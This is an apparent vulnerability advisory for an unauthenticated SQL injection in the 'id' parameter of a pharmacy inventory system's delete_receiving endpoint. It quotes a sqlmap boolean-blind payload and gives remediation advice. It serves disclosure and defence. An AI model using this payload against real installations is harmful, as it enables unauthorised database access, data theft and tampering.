# Vulnerability Summary: SQL Injection in Pharmacy Sales and Inventory System V1.0 ## Vulnerability Overview * **Affected Product**: Pharmacy Sales and Inventory System Project V1.0 * **Vulnerability Type**: SQL Injection (SQLi) * **Vulnerable File**: `/ajax.php?action=delete_receiving` * **Vulnerable Parameter**: POST parameter `id` * **Root Cause**: Attackers can inject malicious code into the `id` parameter, which is not properly sanitized or validated within SQL queries. Attackers can forge input values to manipulate SQL queries and execute unauthorized operations. * **Exploitation Conditions**: No authentication or authorization is required to exploit this vulnerability. ## Impact Scope * Attackers can gain unauthorized access to the database. * Leakage of sensitive data. * Data tampering. * Full system control. * Service disruption, posing a severe threat to system security and business continuity. ## Proof of Concept (POC) **SQLMap Output Log:** ```text Parameter: id (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (4784=4784) THEN 5 ELSE (SELECT 7976 UNION SELECT 3350) END)) ``` ## Remediation 1. **Use Prepared Statements and Parameter Binding**: Prepared statements prevent SQL injection by separating SQL code from user input data. When using prepared statements, user input values are treated as pure data and are not interpreted as SQL code. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with elevated privileges (such as root or admin) for daily operations. 4. **Regular Security Audits**: Conduct regular security audits of code and systems to identify and remediate potential security vulnerabilities in a timely manner.